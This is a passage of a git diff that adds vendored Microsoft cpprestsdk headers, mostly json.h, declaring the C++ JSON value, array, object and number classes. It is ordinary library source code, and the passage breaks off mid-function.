WinRT streams are defined in terms of single-byte characters only. +class winrt_stream +{ +public: + /// + /// Creates a WinRT IInputStream reference from an asynchronous stream buffer. + /// + /// A stream buffer based on a single-byte character. + /// A reference to a WinRT IInputStream. + /// + /// The stream buffer passed in must allow reading. + /// The stream buffer is shared with the caller, allowing data to be passed between the two contexts. For + /// example, using a producer_consumer_buffer, a Casablanca-based caller can pass data to a WinRT component. + /// + _ASYNCRTIMP static Windows::Storage::Streams::IInputStream ^ + __cdecl create_input_stream(const concurrency::streams::streambuf& buffer); + + /// + /// Creates a WinRT IOutputStream reference from an asynchronous stream buffer. + /// + /// A stream buffer based on a single-byte character. + /// A reference to a WinRT IOutputStream. + /// + /// The stream buffer passed in must allow writing. + /// The stream buffer is shared with the caller, allowing data to be passed between the two contexts. For + /// example, using a producer_consumer_buffer, a Casablanca-based caller can retrieve data from a WinRT + /// component. + /// + _ASYNCRTIMP static Windows::Storage::Streams::IOutputStream ^ + __cdecl create_output_stream(const concurrency::streams::streambuf& buffer); + + /// + /// Creates a WinRT IRandomAccessStream reference from an asynchronous input stream. + /// + /// A stream based on a single-byte character. + /// A reference to a WinRT IRandomAccessStream. + /// + /// The stream buffer is shared with the caller, allowing data to be passed between the two contexts. For + /// example, using a producer_consumer_buffer, a Casablanca-based caller can pass data to and retrieve data + /// from a WinRT component. + /// + _ASYNCRTIMP static Windows::Storage::Streams::IRandomAccessStream ^ + __cdecl create_random_access_stream(const concurrency::streams::streambuf& buffer); +}; + +#endif + +} // namespace streams +} // namespace Concurrency + +#if defined(_WIN32) +#pragma warning(pop) +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/json.h b/Src/Common/CppRestSdk/include/cpprest/json.h new file mode 100644 index 0000000..fb28e71 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/json.h @@ -0,0 +1,1786 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * HTTP Library: JSON parser and writer + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_JSON_H +#define CASA_JSON_H + +#include "Common/CppRestSdk/include/cpprest/asyncrt_utils.h" +#include "Common/CppRestSdk/include/cpprest/details/basic_types.h" +#include +#include +#include +#include +#include +#include + +namespace web +{ +/// Library for parsing and serializing JSON values to and from C++ types. +namespace json +{ +// Various forward declarations. +namespace details +{ +class _Value; +class _Number; +class _Null; +class _Boolean; +class _String; +class _Object; +class _Array; +template +class JSON_Parser; +} // namespace details + +namespace details +{ +extern bool g_keep_json_object_unsorted; +} + +/// +/// Preserve the order of the name/value pairs when parsing a JSON object. +/// The default is false, which can yield better performance. +/// +/// true if ordering should be preserved when parsing, false otherwise. +/// Note this is a global setting and affects all JSON parsing done. +void _ASYNCRTIMP __cdecl keep_object_element_order(bool keep_order); + +#ifdef _WIN32 +#ifdef _DEBUG +#define ENABLE_JSON_VALUE_VISUALIZER +#endif +#endif + +class number; +class array; +class object; + +/// +/// A JSON value represented as a C++ class. +/// +class value +{ +public: + /// + /// This enumeration represents the various kinds of JSON values. + /// + enum value_type + { + /// Number value + Number, + /// Boolean value + Boolean, + /// String value + String, + /// Object value + Object, + /// Array value + Array, + /// Null value + Null + }; + + /// + /// Constructor creating a null value + /// + _ASYNCRTIMP value(); + + /// + /// Constructor creating a JSON number value + /// + /// The C++ value to create a JSON value from + _ASYNCRTIMP value(int32_t value); + + /// + /// Constructor creating a JSON number value + /// + /// The C++ value to create a JSON value from + _ASYNCRTIMP value(uint32_t value); + + /// + /// Constructor creating a JSON number value + /// + /// The C++ value to create a JSON value from + _ASYNCRTIMP value(int64_t value); + + /// + /// Constructor creating a JSON number value + /// + /// The C++ value to create a JSON value from + _ASYNCRTIMP value(uint64_t value); + + /// + /// Constructor creating a JSON number value + /// + /// The C++ value to create a JSON value from + _ASYNCRTIMP value(double value); + + /// + /// Constructor creating a JSON Boolean value + /// + /// The C++ value to create a JSON value from + _ASYNCRTIMP explicit value(bool value); + + /// + /// Constructor creating a JSON string value + /// + /// The C++ value to create a JSON value from, a C++ STL string of the platform-native character + /// width This constructor has O(n) performance because it tries to determine if specified string + /// has characters that should be properly escaped in JSON. + _ASYNCRTIMP explicit value(utility::string_t value); + + /// + /// Constructor creating a JSON string value specifying if the string contains characters to escape + /// + /// The C++ value to create a JSON value from, a C++ STL string of the platform-native character + /// width Whether contains characters that should + /// be escaped in JSON value This constructor has O(1) performance. + /// + _ASYNCRTIMP explicit value(utility::string_t value, bool has_escape_chars); + + /// + /// Constructor creating a JSON string value + /// + /// The C++ value to create a JSON value from, a C++ STL string of the platform-native character + /// width This constructor has O(n) performance because it tries to determine if specified + /// string has characters that should be properly escaped in JSON. + /// + /// + /// This constructor exists in order to avoid string literals matching another constructor, + /// as is very likely. For example, conversion to bool does not require a user-defined conversion, + /// and will therefore match first, which means that the JSON value turns up as a boolean. + /// + /// + _ASYNCRTIMP explicit value(const utility::char_t* value); + + /// + /// Constructor creating a JSON string value + /// + /// The C++ value to create a JSON value from, a C++ STL string of the platform-native character + /// width Whether contains characters + /// + /// This overload has O(1) performance. + /// + /// + /// This constructor exists in order to avoid string literals matching another constructor, + /// as is very likely. For example, conversion to bool does not require a user-defined conversion, + /// and will therefore match first, which means that the JSON value turns up as a boolean. + /// + /// + _ASYNCRTIMP explicit value(const utility::char_t* value, bool has_escape_chars); + + /// + /// Copy constructor + /// + _ASYNCRTIMP value(const value&); + + /// + /// Move constructor + /// + _ASYNCRTIMP value(value&&) CPPREST_NOEXCEPT; + + /// + /// Assignment operator. + /// + /// The JSON value object that contains the result of the assignment. + _ASYNCRTIMP value& operator=(const value&); + + /// + /// Move assignment operator. + /// + /// The JSON value object that contains the result of the assignment. + _ASYNCRTIMP value& operator=(value&&) CPPREST_NOEXCEPT; + + // Static factories + + /// + /// Creates a null value + /// + /// A JSON null value + static _ASYNCRTIMP value __cdecl null(); + + /// + /// Creates a number value + /// + /// The C++ value to create a JSON value from + /// A JSON number value + static _ASYNCRTIMP value __cdecl number(double value); + + /// + /// Creates a number value + /// + /// The C++ value to create a JSON value from + /// A JSON number value + static _ASYNCRTIMP value __cdecl number(int32_t value); + + /// + /// Creates a number value + /// + /// The C++ value to create a JSON value from + /// A JSON number value + static _ASYNCRTIMP value __cdecl number(uint32_t value); + + /// + /// Creates a number value + /// + /// The C++ value to create a JSON value from + /// A JSON number value + static _ASYNCRTIMP value __cdecl number(int64_t value); + + /// + /// Creates a number value + /// + /// The C++ value to create a JSON value from + /// A JSON number value + static _ASYNCRTIMP value __cdecl number(uint64_t value); + + /// + /// Creates a Boolean value + /// + /// The C++ value to create a JSON value from + /// A JSON Boolean value + static _ASYNCRTIMP value __cdecl boolean(bool value); + + /// + /// Creates a string value + /// + /// The C++ value to create a JSON value from + /// A JSON string value + /// + /// This overload has O(n) performance because it tries to determine if + /// specified string has characters that should be properly escaped in JSON. + /// + static _ASYNCRTIMP value __cdecl string(utility::string_t value); + + /// + /// Creates a string value specifying if the string contains characters to escape + /// + /// The C++ value to create a JSON value from + /// Whether contains characters + /// that should be escaped in JSON value + /// A JSON string value + /// + /// This overload has O(1) performance. + /// + static _ASYNCRTIMP value __cdecl string(utility::string_t value, bool has_escape_chars); + +#ifdef _WIN32 +private: + // Only used internally by JSON parser. + static _ASYNCRTIMP value __cdecl string(const std::string& value); + +public: +#endif + + /// + /// Creates an object value + /// + /// Whether to preserve the original order of the fields + /// An empty JSON object value + static _ASYNCRTIMP json::value __cdecl object(bool keep_order = false); + + /// + /// Creates an object value from a collection of field/values + /// + /// Field names associated with JSON values + /// Whether to preserve the original order of the fields + /// A non-empty JSON object value + static _ASYNCRTIMP json::value __cdecl object(std::vector> fields, + bool keep_order = false); + + /// + /// Creates an empty JSON array + /// + /// An empty JSON array value + static _ASYNCRTIMP json::value __cdecl array(); + + /// + /// Creates a JSON array + /// + /// The initial number of elements of the JSON value + /// A JSON array value + static _ASYNCRTIMP json::value __cdecl array(size_t size); + + /// + /// Creates a JSON array + /// + /// A vector of JSON values + /// A JSON array value + static _ASYNCRTIMP json::value __cdecl array(std::vector elements); + + /// + /// Accesses the type of JSON value the current value instance is + /// + /// The value's type + _ASYNCRTIMP json::value::value_type type() const; + + /// + /// Is the current value a null value? + /// + /// true if the value is a null value, false otherwise + bool is_null() const { return type() == Null; }; + + /// + /// Is the current value a number value? + /// + /// true if the value is a number value, false otherwise + bool is_number() const { return type() == Number; } + + /// + /// Is the current value represented as an integer number value? + /// + /// + /// Note that if a json value is a number but represented as a double it can still + /// be retrieved as a integer using as_integer(), however the value will be truncated. + /// + /// true if the value is an integer value, false otherwise. + _ASYNCRTIMP bool is_integer() const; + + /// + /// Is the current value represented as an double number value? + /// + /// + /// Note that if a json value is a number but represented as a int it can still + /// be retrieved as a double using as_double(). + /// + /// true if the value is an double value, false otherwise. + _ASYNCRTIMP bool is_double() const; + + /// + /// Is the current value a Boolean value? + /// + /// true if the value is a Boolean value, false otherwise + bool is_boolean() const { return type() == Boolean; } + + /// + /// Is the current value a string value? + /// + /// true if the value is a string value, false otherwise + bool is_string() const { return type() == String; } + + /// + /// Is the current value an array? + /// + /// true if the value is an array, false otherwise + bool is_array() const { return type() == Array; } + + /// + /// Is the current value an object? + /// + /// true if the value is an object, false otherwise + bool is_object() const { return type() == Object; } + + /// + /// Gets the number of children of the value. + /// + /// The number of children. 0 for all non-composites. + size_t size() const; + + /// + /// Parses a string and construct a JSON value. + /// + /// The C++ value to create a JSON value from, a C++ STL double-byte string + _ASYNCRTIMP static value __cdecl parse(const utility::string_t& value); + + /// + /// Attempts to parse a string and construct a JSON value. + /// + /// The C++ value to create a JSON value from, a C++ STL double-byte string + /// If parsing fails, the error code is greater than 0 + /// The parsed object. Returns web::json::value::null if failed + _ASYNCRTIMP static value __cdecl parse(const utility::string_t& value, std::error_code& errorCode); + + /// + /// Serializes the current JSON value to a C++ string. + /// + /// A string representation of the value + _ASYNCRTIMP utility::string_t serialize() const; + + /// + /// Serializes the current JSON value to a C++ string. + /// + /// A string representation of the value + CASABLANCA_DEPRECATED("This API is deprecated and has been renamed to avoid confusion with as_string(), use " + "::web::json::value::serialize() instead.") + _ASYNCRTIMP utility::string_t to_string() const; + + /// + /// Parses a JSON value from the contents of an input stream using the native platform character width. + /// + /// The stream to read the JSON value from + /// The JSON value object created from the input stream. + _ASYNCRTIMP static value __cdecl parse(utility::istream_t& input); + + /// + /// Parses a JSON value from the contents of an input stream using the native platform character width. + /// + /// The stream to read the JSON value from + /// If parsing fails, the error code is greater than 0 + /// The parsed object. Returns web::json::value::null if failed + _ASYNCRTIMP static value __cdecl parse(utility::istream_t& input, std::error_code& errorCode); + + /// + /// Writes the current JSON value to a stream with the native platform character width. + /// + /// The stream that the JSON string representation should be written to. + _ASYNCRTIMP void serialize(utility::ostream_t& stream) const; + +#ifdef _WIN32 + /// + /// Parses a JSON value from the contents of a single-byte (UTF8) stream. + /// + /// The stream to read the JSON value from + _ASYNCRTIMP static value __cdecl parse(std::istream& stream); + + /// + /// Parses a JSON value from the contents of a single-byte (UTF8) stream. + /// + /// The stream to read the JSON value from + /// If parsing fails, the error code is greater than 0 + /// The parsed object. Returns web::json::value::null if failed + _ASYNCRTIMP static value __cdecl parse(std::istream& stream, std::error_code& error); + + /// + /// Serializes the content of the value into a single-byte (UTF8) stream. + /// + /// The stream that the JSON string representation should be written to. + _ASYNCRTIMP void serialize(std::ostream& stream) const; +#endif + + /// + /// Converts the JSON value to a C++ double, if and only if it is a number value. + /// Throws if the value is not a number + /// + /// A double representation of the value + _ASYNCRTIMP double as_double() const; + + /// + /// Converts the JSON value to a C++ integer, if and only if it is a number value. + /// Throws if the value is not a number + /// + /// An integer representation of the value + _ASYNCRTIMP int as_integer() const; + + /// + /// Converts the JSON value to a number class, if and only if it is a number value. + /// Throws if the value is not a number + /// + /// An instance of number class + _ASYNCRTIMP const json::number& as_number() const; + + /// + /// Converts the JSON value to a C++ bool, if and only if it is a Boolean value. + /// + /// A C++ bool representation of the value + _ASYNCRTIMP bool as_bool() const; + + /// + /// Converts the JSON value to a json array, if and only if it is an array value. + /// + /// The returned json::array should have the same or shorter lifetime as this + /// An array representation of the value + _ASYNCRTIMP json::array& as_array(); + + /// + /// Converts the JSON value to a json array, if and only if it is an array value. + /// + /// The returned json::array should have the same or shorter lifetime as this + /// An array representation of the value + _ASYNCRTIMP const json::array& as_array() const; + + /// + /// Converts the JSON value to a json object, if and only if it is an object value. + /// + /// An object representation of the value + _ASYNCRTIMP json::object& as_object(); + + /// + /// Converts the JSON value to a json object, if and only if it is an object value. + /// + /// An object representation of the value + _ASYNCRTIMP const json::object& as_object() const; + + /// + /// Converts the JSON value to a C++ STL string, if and only if it is a string value. + /// + /// A C++ STL string representation of the value + _ASYNCRTIMP const utility::string_t& as_string() const; + + /// + /// Compares two JSON values for equality. + /// + /// The JSON value to compare with. + /// True if the values are equal. + _ASYNCRTIMP bool operator==(const value& other) const; + + /// + /// Compares two JSON values for inequality. + /// + /// The JSON value to compare with. + /// True if the values are unequal. + bool operator!=(const value& other) const { return !((*this) == other); } + + /// + /// Tests for the presence of a field. + /// + /// The name of the field + /// True if the field exists, false otherwise. + bool has_field(const utility::string_t& key) const; + + /// + /// Tests for the presence of a number field + /// + /// The name of the field + /// True if the field exists, false otherwise. + _ASYNCRTIMP bool has_number_field(const utility::string_t& key) const; + + /// + /// Tests for the presence of an integer field + /// + /// The name of the field + /// True if the field exists, false otherwise. + _ASYNCRTIMP bool has_integer_field(const utility::string_t& key) const; + + /// + /// Tests for the presence of a double field + /// + /// The name of the field + /// True if the field exists, false otherwise. + _ASYNCRTIMP bool has_double_field(const utility::string_t& key) const; + + /// + /// Tests for the presence of a boolean field + /// + /// The name of the field + /// True if the field exists, false otherwise. + _ASYNCRTIMP bool has_boolean_field(const utility::string_t& key) const; + + /// + /// Tests for the presence of a string field + /// + /// The name of the field + /// True if the field exists, false otherwise. + _ASYNCRTIMP bool has_string_field(const utility::string_t& key) const; + + /// + /// Tests for the presence of an array field + /// + /// The name of the field + /// True if the field exists, false otherwise. + _ASYNCRTIMP bool has_array_field(const utility::string_t& key) const; + + /// + /// Tests for the presence of an object field + /// + /// The name of the field + /// True if the field exists, false otherwise. + _ASYNCRTIMP bool has_object_field(const utility::string_t& key) const; + + /// + /// Accesses a field of a JSON object. + /// + /// The name of the field + /// The value kept in the field; null if the field does not exist + CASABLANCA_DEPRECATED( + "This API is deprecated and will be removed in a future release, use json::value::at() instead.") + value get(const utility::string_t& key) const; + + /// + /// Erases an element of a JSON array. Throws if index is out of bounds. + /// + /// The index of the element to erase in the JSON array. + _ASYNCRTIMP void erase(size_t index); + + /// + /// Erases an element of a JSON object. Throws if the key doesn't exist. + /// + /// The key of the element to erase in the JSON object. + _ASYNCRTIMP void erase(const utility::string_t& key); + + /// + /// Accesses an element of a JSON array. Throws when index out of bounds. + /// + /// The index of an element in the JSON array. + /// A reference to the value. + _ASYNCRTIMP json::value& at(size_t index); + + /// + /// Accesses an element of a JSON array. Throws when index out of bounds. + /// + /// The index of an element in the JSON array. + /// A reference to the value. + _ASYNCRTIMP const json::value& at(size_t index) const; + + /// + /// Accesses an element of a JSON object. If the key doesn't exist, this method throws. + /// + /// The key of an element in the JSON object. + /// If the key exists, a reference to the value. + _ASYNCRTIMP json::value& at(const utility::string_t& key); + + /// + /// Accesses an element of a JSON object. If the key doesn't exist, this method throws. + /// + /// The key of an element in the JSON object. + /// If the key exists, a reference to the value. + _ASYNCRTIMP const json::value& at(const utility::string_t& key) const; + + /// + /// Accesses a field of a JSON object. + /// + /// The name of the field + /// A reference to the value kept in the field. + _ASYNCRTIMP value& operator[](const utility::string_t& key); + +#ifdef _WIN32 +private: + // Only used internally by JSON parser + _ASYNCRTIMP value& operator[](const std::string& key) + { + // JSON object stores its field map as a unordered_map of string_t, so this conversion is hard to avoid + return operator[](utility::conversions::to_string_t(key)); + } + +public: +#endif + + /// + /// Accesses an element of a JSON array. + /// + /// The index of an element in the JSON array + /// The value kept at the array index; null if outside the boundaries of the array + CASABLANCA_DEPRECATED( + "This API is deprecated and will be removed in a future release, use json::value::at() instead.") + value get(size_t index) const; + + /// + /// Accesses an element of a JSON array. + /// + /// The index of an element in the JSON array. + /// A reference to the value kept in the field. + _ASYNCRTIMP value& operator[](size_t index); + +private: + friend class web::json::details::_Object; + friend class web::json::details::_Array; + template + friend class web::json::details::JSON_Parser; + +#ifdef _WIN32 + /// + /// Writes the current JSON value as a double-byte string to a string instance. + /// + /// The string that the JSON representation should be written to. + _ASYNCRTIMP void format(std::basic_string& string) const; +#endif + /// + /// Serializes the content of the value into a string instance in UTF8 format + /// + /// The string that the JSON representation should be written to + _ASYNCRTIMP void format(std::basic_string& string) const; + +#ifdef ENABLE_JSON_VALUE_VISUALIZER + explicit value(std::unique_ptr v, value_type kind) : m_value(std::move(v)), m_kind(kind) +#else + explicit value(std::unique_ptr v) : m_value(std::move(v)) +#endif + { + } + + std::unique_ptr m_value; +#ifdef ENABLE_JSON_VALUE_VISUALIZER + value_type m_kind; +#endif +}; + +/// +/// A single exception type to represent errors in parsing, converting, and accessing +/// elements of JSON values. +/// +class json_exception : public std::exception +{ +private: + std::string _message; + +public: + json_exception(const char* const message) : _message(message) {} +#ifdef _UTF16_STRINGS + json_exception(const wchar_t* const message) : _message(utility::conversions::utf16_to_utf8(message)) {} +#endif // _UTF16_STRINGS + json_exception(std::string&& message) : _message(std::move(message)) {} + + // Must be narrow string because it derives from std::exception + const char* what() const CPPREST_NOEXCEPT { return _message.c_str(); } +}; + +namespace details +{ +enum json_error +{ + left_over_character_in_stream = 1, + malformed_array_literal, + malformed_comment, + malformed_literal, + malformed_object_literal, + malformed_numeric_literal, + malformed_string_literal, + malformed_token, + mismatched_brances, + nesting, + unexpected_token +}; + +class json_error_category_impl : public std::error_category +{ +public: + virtual const char* name() const CPPREST_NOEXCEPT override { return "json"; } + + virtual std::string message(int ev) const override + { + switch (ev) + { + case json_error::left_over_character_in_stream: + return "Left-over characters in stream after parsing a JSON value"; + case json_error::malformed_array_literal: return "Malformed array literal"; + case json_error::malformed_comment: return "Malformed comment"; + case json_error::malformed_literal: return "Malformed literal"; + case json_error::malformed_object_literal: return "Malformed object literal"; + case json_error::malformed_numeric_literal: return "Malformed numeric literal"; + case json_error::malformed_string_literal: return "Malformed string literal"; + case json_error::malformed_token: return "Malformed token"; + case json_error::mismatched_brances: return "Mismatched braces"; + case json_error::nesting: return "Nesting too deep"; + case json_error::unexpected_token: return "Unexpected token"; + default: return "Unknown json error"; + } + } +}; + +const json_error_category_impl& json_error_category(); +} // namespace details + +/// +/// A JSON array represented as a C++ class. +/// +class array +{ + typedef std::vector storage_type; + +public: + typedef storage_type::iterator iterator; + typedef storage_type::const_iterator const_iterator; + typedef storage_type::reverse_iterator reverse_iterator; + typedef storage_type::const_reverse_iterator const_reverse_iterator; + typedef storage_type::size_type size_type; + +private: + array() : m_elements() {} + array(size_type size) : m_elements(size) {} + array(storage_type elements) : m_elements(std::move(elements)) {} + +public: + /// + /// Gets the beginning iterator element of the array + /// + /// An iterator to the beginning of the JSON array. + iterator begin() { return m_elements.begin(); } + + /// + /// Gets the beginning const iterator element of the array. + /// + /// A const_iterator to the beginning of the JSON array. + const_iterator begin() const { return m_elements.cbegin(); } + + /// + /// Gets the end iterator element of the array + /// + /// An iterator to the end of the JSON array. + iterator end() { return m_elements.end(); } + + /// + /// Gets the end const iterator element of the array. + /// + /// A const_iterator to the end of the JSON array. + const_iterator end() const { return m_elements.cend(); } + + /// + /// Gets the beginning reverse iterator element of the array + /// + /// An reverse_iterator to the beginning of the JSON array. + reverse_iterator rbegin() { return m_elements.rbegin(); } + + /// + /// Gets the beginning const reverse iterator element of the array + /// + /// An const_reverse_iterator to the beginning of the JSON array. + const_reverse_iterator rbegin() const { return m_elements.rbegin(); } + + /// + /// Gets the end reverse iterator element of the array + /// + /// An reverse_iterator to the end of the JSON array. + reverse_iterator rend() { return m_elements.rend(); } + + /// + /// Gets the end const reverse iterator element of the array + /// + /// An const_reverse_iterator to the end of the JSON array. + const_reverse_iterator rend() const { return m_elements.crend(); } + + /// + /// Gets the beginning const iterator element of the array. + /// + /// A const_iterator to the beginning of the JSON array. + const_iterator cbegin() const { return m_elements.cbegin(); } + + /// + /// Gets the end const iterator element of the array. + /// + /// A const_iterator to the end of the JSON array. + const_iterator cend() const { return m_elements.cend(); } + + /// + /// Gets the beginning const reverse iterator element of the array. + /// + /// A const_reverse_iterator to the beginning of the JSON array. + const_reverse_iterator crbegin() const { return m_elements.crbegin(); } + + /// + /// Gets the end const reverse iterator element of the array. + /// + /// A const_reverse_iterator to the end of the JSON array. + const_reverse_iterator crend() const { return m_elements.crend(); } + + /// + /// Deletes an element of the JSON array. + /// + /// A const_iterator to the element to delete. + /// Iterator to the new location of the element following the erased element. + /// GCC doesn't support erase with const_iterator on vector yet. In the future this should be + /// changed. + iterator erase(iterator position) { return m_elements.erase(position); } + + /// + /// Deletes the element at an index of the JSON array. + /// + /// The index of the element to delete. + void erase(size_type index) + { + if (index >= m_elements.size()) + { + throw json_exception("index out of bounds"); + } + m_elements.erase(m_elements.begin() + index); + } + + /// + /// Accesses an element of a JSON array. Throws when index out of bounds. + /// + /// The index of an element in the JSON array. + /// A reference to the value kept in the field. + json::value& at(size_type index) + { + if (index >= m_elements.size()) throw json_exception("index out of bounds"); + + return m_elements[index]; + } + + /// + /// Accesses an element of a JSON array. Throws when index out of bounds. + /// + /// The index of an element in the JSON array. + /// A reference to the value kept in the field. + const json::value& at(size_type index) const + { + if (index >= m_elements.size()) throw json_exception("index out of bounds"); + + return m_elements[index]; + } + + /// + /// Accesses an element of a JSON array. + /// + /// The index of an element in the JSON array. + /// A reference to the value kept in the field. + json::value& operator[](size_type index) + { + msl::safeint3::SafeInt nMinSize(index); + nMinSize += 1; + msl::safeint3::SafeInt nlastSize(m_elements.size()); + if (nlastSize < nMinSize) m_elements.resize(nMinSize); + + return m_elements[index]; + } + + /// + /// Gets the number of elements of the array. + /// + /// The number of elements. + size_type size() const { return m_elements.size(); } + +private: + storage_type m_elements; + + friend class details::_Array; + template + friend class json::details::JSON_Parser; +}; + +/// +/// A JSON object represented as a C++ class. +/// +class object +{ + typedef std::vector> storage_type; + +public: + typedef storage_type::iterator iterator; + typedef storage_type::const_iterator const_iterator; + typedef storage_type::reverse_iterator reverse_iterator; + typedef storage_type::const_reverse_iterator const_reverse_iterator; + typedef storage_type::size_type size_type; + +private: + object(bool keep_order = false) : m_elements(), m_keep_order(keep_order) {} + object(storage_type elements, bool keep_order = false) : m_elements(std::move(elements)), m_keep_order(keep_order) + { + if (!keep_order) + { + sort(m_elements.begin(), m_elements.end(), compare_pairs); + } + } + +public: + /// + /// Gets the beginning iterator element of the object + /// + /// An iterator to the beginning of the JSON object. + iterator begin() { return m_elements.begin(); } + + /// + /// Gets the beginning const iterator element of the object. + /// + /// A const_iterator to the beginning of the JSON object. + const_iterator begin() const { return m_elements.cbegin(); } + + /// + /// Gets the end iterator element of the object + /// + /// An iterator to the end of the JSON object. + iterator end() { return m_elements.end(); } + + /// + /// Gets the end const iterator element of the object. + /// + /// A const_iterator to the end of the JSON object. + const_iterator end() const { return m_elements.cend(); } + + /// + /// Gets the beginning reverse iterator element of the object + /// + /// An reverse_iterator to the beginning of the JSON object. + reverse_iterator rbegin() { return m_elements.rbegin(); } + + /// + /// Gets the beginning const reverse iterator element of the object + /// + /// An const_reverse_iterator to the beginning of the JSON object. + const_reverse_iterator rbegin() const { return m_elements.rbegin(); } + + /// + /// Gets the end reverse iterator element of the object + /// + /// An reverse_iterator to the end of the JSON object. + reverse_iterator rend() { return m_elements.rend(); } + + /// + /// Gets the end const reverse iterator element of the object + /// + /// An const_reverse_iterator to the end of the JSON object. + const_reverse_iterator rend() const { return m_elements.crend(); } + + /// + /// Gets the beginning const iterator element of the object. + /// + /// A const_iterator to the beginning of the JSON object. + const_iterator cbegin() const { return m_elements.cbegin(); } + + /// + /// Gets the end const iterator element of the object. + /// + /// A const_iterator to the end of the JSON object. + const_iterator cend() const { return m_elements.cend(); } + + /// + /// Gets the beginning const reverse iterator element of the object. + /// + /// A const_reverse_iterator to the beginning of the JSON object. + const_reverse_iterator crbegin() const { return m_elements.crbegin(); } + + /// + /// Gets the end const reverse iterator element of the object. + /// + /// A const_reverse_iterator to the end of the JSON object. + const_reverse_iterator crend() const { return m_elements.crend(); } + + /// + /// Deletes an element of the JSON object. + /// + /// A const_iterator to the element to delete. + /// Iterator to the new location of the element following the erased element. + /// GCC doesn't support erase with const_iterator on vector yet. In the future this should be + /// changed. + iterator erase(iterator position) { return m_elements.erase(position); } + + /// + /// Deletes an element of the JSON object. If the key doesn't exist, this method throws. + /// + /// The key of an element in the JSON object. + void erase(const utility::string_t& key) + { + auto iter = find_by_key(key); + if (iter == m_elements.end()) + { + throw web::json::json_exception("Key not found"); + } + + m_elements.erase(iter); + } + + /// + /// Accesses an element of a JSON object. If the key doesn't exist, this method throws. + /// + /// The key of an element in the JSON object. + /// If the key exists, a reference to the value kept in the field. + json::value& at(const utility::string_t& key) + { + auto iter = find_by_key(key); + if (iter == m_elements.end()) + { + throw web::json::json_exception("Key not found"); + } + + return iter->second; + } + + /// + /// Accesses an element of a JSON object. If the key doesn't exist, this method throws. + /// + /// The key of an element in the JSON object. + /// If the key exists, a reference to the value kept in the field. + const json::value& at(const utility::string_t& key) const + { + auto iter = find_by_key(key); + if (iter == m_elements.end()) + { + throw web::json::json_exception("Key not found"); + } + + return iter->second; + } + + /// + /// Accesses an element of a JSON object. + /// + /// The key of an element in the JSON object. + /// If the key exists, a reference to the value kept in the field, otherwise a newly created null value + /// that will be stored for the given key. + json::value& operator[](const utility::string_t& key) + { + auto iter = find_insert_location(key); + + if (iter == m_elements.end() || key != iter->first) + { + return m_elements.insert(iter, std::pair(key, value()))->second; + } + + return iter->second; + } + + /// + /// Gets an iterator to an element of a JSON object. + /// + /// The key of an element in the JSON object. + /// A const iterator to the value kept in the field. + const_iterator find(const utility::string_t& key) const { return find_by_key(key); } + + /// + /// Gets the number of elements of the object. + /// + /// The number of elements. + size_type size() const { return m_elements.size(); } + + /// + /// Checks if there are any elements in the JSON object. + /// + /// True if empty. + bool empty() const { return m_elements.empty(); } + +private: + static bool compare_pairs(const std::pair& p1, + const std::pair& p2) + { + return p1.first < p2.first; + } + static bool compare_with_key(const std::pair& p1, const utility::string_t& key) + { + return p1.first < key; + } + + storage_type::iterator find_insert_location(const utility::string_t& key) + { + if (m_keep_order) + { + return std::find_if(m_elements.begin(), + m_elements.end(), + [&key](const std::pair& p) { return p.first == key; }); + } + else + { + return std::lower_bound(m_elements.begin(), m_elements.end(), key, compare_with_key); + } + } + + storage_type::const_iterator find_by_key(const utility::string_t& key) const + { + if (m_keep_order) + { + return std::find_if(m_elements.begin(), + m_elements.end(), + [&key](const std::pair& p) { return p.first == key; }); + } + else + { + auto iter = std::lower_bound(m_elements.begin(), m_elements.end(), key, compare_with_key); + if (iter != m_elements.end() && key != iter->first) + { + return m_elements.end(); + } + return iter; + } + } + + storage_type::iterator find_by_key(const utility::string_t& key) + { + auto iter = find_insert_location(key); + if (iter != m_elements.end() && key != iter->first) + { + return m_elements.end(); + } + return iter; + } + + storage_type m_elements; + bool m_keep_order; + friend class details::_Object; + + template + friend class json::details::JSON_Parser; +}; + +/// +/// A JSON number represented as a C++ class. +/// +class number +{ + // Note that these constructors make sure that only negative integers are stored as signed int64 (while others + // convert to unsigned int64). This helps handling number objects e.g. comparing two numbers. + + number(double value) : m_value(value), m_type(double_type) {} + number(int32_t value) : m_intval(value), m_type(value < 0 ? signed_type : unsigned_type) {} + number(uint32_t value) : m_intval(value), m_type(unsigned_type) {} + number(int64_t value) : m_intval(value), m_type(value < 0 ? signed_type : unsigned_type) {} + number(uint64_t value) : m_uintval(value), m_type(unsigned_type) {} + +public: + /// + /// Does the number fit into int32? + /// + /// true if the number fits into int32, false otherwise + _ASYNCRTIMP bool is_int32() const; + + /// + /// Does the number fit into unsigned int32? + /// + /// true if the number fits into unsigned int32, false otherwise + _ASYNCRTIMP bool is_uint32() const; + + /// + /// Does the number fit into int64? + /// + /// true if the number fits into int64, false otherwise + _ASYNCRTIMP bool is_int64() const; + + /// + /// Does the number fit into unsigned int64? + /// + /// true if the number fits into unsigned int64, false otherwise + bool is_uint64() const + { + switch (m_type) + { + case signed_type: return m_intval >= 0; + case unsigned_type: return true; + case double_type: + default: return false; + } + } + + /// + /// Converts the JSON number to a C++ double. + /// + /// A double representation of the number + double to_double() const + { + switch (m_type) + { + case double_type: return m_value; + case signed_type: return static_cast(m_intval); + case unsigned_type: return static_cast(m_uintval); + default: return false; + } + } + + /// + /// Converts the JSON number to int32. + /// + /// An int32 representation of the number + int32_t to_int32() const + { + if (m_type == double_type) + return static_cast(m_value); + else + return static_cast(m_intval); + } + + /// + /// Converts the JSON number to unsigned int32. + /// + /// An unsigned int32 representation of the number + uint32_t to_uint32() const + { + if (m_type == double_type) + return static_cast(m_value); + else + return static_cast(m_intval); + } + + /// + /// Converts the JSON number to int64. + /// + /// An int64 representation of the number + int64_t to_int64() const + { + if (m_type == double_type) + return static_cast(m_value); + else + return 